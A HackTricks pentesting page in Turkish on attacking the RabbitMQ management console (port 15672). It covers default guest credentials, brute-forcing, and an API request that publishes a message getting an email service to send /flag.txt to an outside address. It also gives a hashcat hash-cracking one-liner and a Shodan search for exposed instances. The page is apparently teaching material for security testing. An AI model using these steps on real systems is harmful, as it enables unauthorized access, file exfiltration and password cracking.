hacktricks/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md

53 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 15672 - Pentesting RabbitMQ Yönetimi
{{#include ../banners/hacktricks-training.md}}
## Temel Bilgiler
RabbitMQ hakkında daha fazla bilgi edinebilirsiniz [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\
Bu portta, [management plugin](https://www.rabbitmq.com/management.html) etkinse RabbitMQ Yönetim web konsolunu bulabilirsiniz.\
Ana sayfa şöyle görünmelidir:
![](<../images/image (336).png>)
## Sayım
Varsayılan kimlik bilgileri "_**guest**_":"_**guest**_". Eğer bunlar çalışmıyorsa [**giriş için brute-force deneyebilirsiniz**](../generic-hacking/brute-force.md#http-post-form).
Bu modülü manuel olarak başlatmak için şunu çalıştırmanız gerekir:
```
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```
Doğru bir şekilde kimlik doğruladıktan sonra admin konsolunu göreceksiniz:
![](<../images/image (441).png>)
Ayrıca, geçerli kimlik bilgilerine sahipseniz `http://localhost:15672/api/connections` adresindeki bilgilerin ilginç olabileceğini görebilirsiniz.
Ayrıca, bu hizmetin API'sini kullanarak **bir kuyruğun içine veri yayınlamak** mümkün olduğunu unutmayın; bir istekle:
```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
## Hash Kırma
```bash
echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
```
### Shodan
- `port:15672 http`
{{#include ../banners/hacktricks-training.md}}